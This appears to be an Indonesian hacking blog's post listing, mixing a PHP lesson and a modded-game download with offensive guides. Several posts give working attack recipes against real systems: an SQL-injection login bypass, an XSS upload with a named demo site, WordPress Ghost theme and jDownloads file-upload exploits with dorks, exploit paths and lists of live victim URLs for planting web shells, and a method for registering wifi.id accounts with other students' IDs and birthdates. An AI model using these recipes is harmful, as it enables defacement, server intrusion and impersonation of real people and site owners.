Bypass SQL Login With Inspect Element

Oke langsung saja kita praktek, pertama
Kita butuh aplikasi Element Editor untuk melakukan edit text nya karena disini input type nya adalah email otomatis kita hanya bisa menginput email saja, untuk apknya bisa kalian download dibawah ini.
Setelah itu install, sesudah diinstal kalian masuk ke apknya lalu pastekan/tulis web targetnya.
Oke next klik tombol panah kecil diatas lalu klik "OFF" yang item code, setelah itu klik form email nya nanti akan muncul source codenya.

Setelah Itu ubah type"email" nya ke "text"
Agar kita bisa menginput data lain atau query string sql tanpa harus menginput gmail, setelah dirubah klik lagi "OFF" yang di item codenya agar ketika kita mengklik form emailnya tidak memunculkan sourcenya. 

Nah sekarang kita tinggal menginput query string sql nya

Dan boomz kita berhasil masuk ke admin dashboard nya :D btw gak semuanya bisa pake cara ini yah tergantung website nya vuln atau tidak, sebenarnya msh ada cara lain tanpa harus merubah input typenya mungkin nanti akan saya post dihari lain.

Oke mungkin itu saja semoga mudah dimengerti dan semoga bisa bermanfaat. 
Continue Reading

File Upload Vulnerability Cross Site Scripting

~ File Upload Vulnerability Cross Site Scripting

Dork : Inurl:/pages/uploader.aspx
Author : Mister_D
Date : 29-09-2019

Demo  :
http://www.tryghedsaftale.dk/Insurance/CommonUI/Pages/Uploader.aspx
Proof : Beri nama file dengan payload xss(payload.jpg)lalu upload
~ Greetz To All - Sunda Cyber Army.
Continue Reading

Crack Password Dengan Tools Ini


Hallo Sobat Ambyar Sehat ? Pastinya Baikya
Kali ini Nih Bakal Ngebahas Crack Password
Pernahkah Anda Ingin Mengetahui Password ? Pastinya Mau ya
Apalagi Password Untuk Mendapatkan Hatinya :v

Nah Tools ini Bisa Crack Berbagai Password Tapi Gk bisa ya kalo buat Cewe atau calon Mertua

Langsung aja Kenalan Ama Tools ini


John The Ripper


 John The Ripper adalah suatu cracker password yang cepat yang tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS dan OpenVMS.Tujuan utama dari John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). John The Ripper merupakan program yang dapat membantu administrator menentukan kelayakan suatu password. Namun John The Ripper juga digunakan oleh pihak-pihak yang tidak berkepentigan untuk mendapatkan password seorang user. Situs resmi John The Ripper berada di http://www.openwall.com/john.

 Nah Jadi Langsung Aja Kenalan Ama So John Ini.

 Bye bye
Continue Reading

Variable Dalam PHP


  • PHP variabel
  • Variabel dalam PHP

Variabel dimulai dengan simbol $ diikuti dengan nama variabel.
Variabel dapat memiliki nama pendek ($x, $y, ...). Namun, nama yang lebih deskriptif akan disukai ($Kapasitas, $total, $nama, $jumlahVerse)
Nama variabel tidak dapat dimulai dengan angka
Nama variabel hanya boleh berisi karakter alfanumerik, huruf kecil atau huruf besar, tanpa aksen dan spasi, dan karakter garis bawah (a..z, A..Z, 0..9, _)
Nama variabel peka huruf besar kecil!
Jenis variabel dinamis: ditentukan oleh nilai yang diberikan padanya
Tugas dibuat oleh tanda sama dengan "="
Rangkaian ini dilakukan pada titik "."
Tampilan variabel
Perintah echo sering digunakan untuk menampilkan variabel di halaman web.

Semoga mudah dimengerti dan semoga bisa bermanfaat ;)
Continue Reading

Download Game Drag Bike 201M Indonesia Mod Apk

Game Drag Bike – Bukan hanya game Bus Simulator Indonesia saja, salah satu game karya anak Bangsa yang satu ini juga tidak kalah populer. Game Drag Bike 201M Indonesia Racing 2019! Kalau kalian suka permainan dengan genre racing khususnya drag bike, wajib cobain deh game ini. Kalian bisa mendownloadnya gratis di Google Play Store, namun bagi kalian yang ingin mencoba APK Versi MODDING-nya, bisa download di link yang akan admin share pada kesempatan kali ini.

 game drag bike 201m mod indonesia apk

Meskipun masih baru, tapi kualitas game drag bike 201m mod Indonesia ini bisa dibilang cukup jempolan dan untuk ukurannya juga tidak berat kok. Untuk gameplaynya sendiri tidak jauh beda seperti balapan pada umumnya. Kalian sebagai player musti finish posisi terdepan dan naik ke podium untuk menjadi juara.

Download Drag Bike Game 201M Terbaru 2019

Untuk membuat drag bike 201m Menarik, nantinya di game ini kalian bisa memilih motor sendiri dengan motor drag pilihanmu mulai dari Ninja R, Motor Matic, Honda C70, Satria dan masih banyak lagi.
itur-Fitur Game MOD Drag Bike 201m ini diantaranya:
  • Ada musik saat balapan.
  • Penonton viewnya Indonesia banget.
  • Ada peta karir.
  • Motor drag yang digunakan motor yang ada di Indonesia.
  • Versi MOD, sudah unlimited money.

Cara Install Game Drag Bike Racing 201m

  1. Pastikan file APK Game sudah terdownload dengan benar dengan mengunjungi link diatas.
  2. Jika sudah, pastikan sebelum menginstall, kalian sudah mengaktifkan fitur sumber daya tak dikenal atau unknown source.
  3. Caranya masuk ke menu setelan->Setelan tambahan->Privasi.
  4. Baru deh install file .APK-nya.
Link download dibawah

http://bit.ly/2kYM4La 
ok sekian wassalamualaikum wr.wb
Continue Reading

Deface WordPress Ghost theme - Arbitrary File Upload Vulnerability



langsung ae mank

1) dork: inurl:wp-content/themes/Ghost/

         kembangin lagi pake otak wibu lo\

2) exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

3) Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}

 


4) buka csrf ( buka mank ) bisa juga pake csrf online
 
post di Filedata ~> inget post nya Filedata




5) sukses upload tinggal akses file

cara akses http://target.com/wp-content/uploads/settingsimages/ shell atau script kalian


kalo hoki kalian bisa dapet yang upload shell

http://www.juvankoski.com/wp-content/uploads/settingsimages/rizky.html


live target: 
http://www.juvankoski.com/wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
 
http://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
 
http://www.exconventosanhipolito.com/web/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
 
http://www.yannickderennes.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
 
http://www.theeasthills.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php 

sekian wassalamualaikum wr.wb
Continue Reading

Tutorial Deface poc jdownloads








1) dork "Powered by jDownloads" 

                 inurl:/index.php?option=com_jdownloads


 dork kembangkan biar mantep

 2) exploit: /index.php?option=com_jdownloads&Itemid=1&view=upload

      atau
              /index.php?option=com_jdownloads&Itemid=1&task=upload

3)  contoh menaruh exploit: 
http://target.lu/index.php?option=com_jdownloads&Itemid=1&view=upload

atau 

http://target.lu/path/index.php?option=com_jdownloads&Itemid=1&view=upload

4)

isi saja yang ada tanda merah ,,, lalu rename shell kalian menjadi shell.php.php.j lalu upload di bagian screansoot nanti shell otomatis berubah menjadi shell.php.j 

 
5) kalau sudah nanti seperti gambar di bawah 



nah tinggal akses sc / shell kalian 

 File/Shell Akses: /images/jdownloads/screenshots/filelu.php.j

 ok sekian wassalamualaikum wr.wb
Continue Reading

Cara Mendapat Akun Wifi.id

Hallo gan. Masih cari tau cara dapetin akun wifi.id kampus? Hehe pasti iya kan. Oke lanjut ke tutor nya

Bahan?
•Handphone/Laptop
•Kuota Internet
•Wifi.id Corner (WICO)
•Kopi/rokok, jangan lupa bawa korek ntar roko nya nganggur :v

1. Pastikan ada kuota internet ya gan
2. Klik link berikut ( KLIK DISINI )
Kalo sudah lihat tampilan di bawahh ya!!!
3. Cari data mahasiswa dengan klik tabel "Perguruan Tinggi" Lalu pilih bebas universitas -> pilih "Kata Kunci" Dan masukan nama orang yang pasaran hehe atau kalian bisa tulis 1 huruf misal nya "A", "B", " C", dan lain-lain. Lalu klik cari
Contoh:
4. Klik nama mahasiswa yang mau kalian jadikan akun komunitas kampus wifi.id, maka tampilan seperti gambar di bawah ini ⬇
5. Salin NIM mahasiswa dan tempel kan di link berikut ( KLIK DISINI )

6.Setelah itu masukan data mahasiswa yang aktif yang tadi.
Catatan Kita lihat dulu tahun Registrasi mahasiswa tersebut apakah ganjil atau genap.
cara melihatnya ada di data mahasiswa yang di cek di data mahasiswa yang aktf di atas.
Jika ganjil pakailah angka 1.
Jika genap pakailah anggka 2.

7. Cari tanggal lahir mahasiswa di mediasosiak mereka misalnya nama nya "Rifqi G" Kalian salin dan tempelkan di facebook/instagram/mediasosial lainya jika ada tanggal lahir nya berarti klean hoki :v

8. Lalu kalian buat akun nya seperti gambar ⬇
 
9. Klik tombol "Proses Data" Dan tarraaaa hasil nya seperti ini!!!
Tinggal pergi ke wifi.id corner deh hehe.
Continue Reading
Subscribe to: Posts (Atom)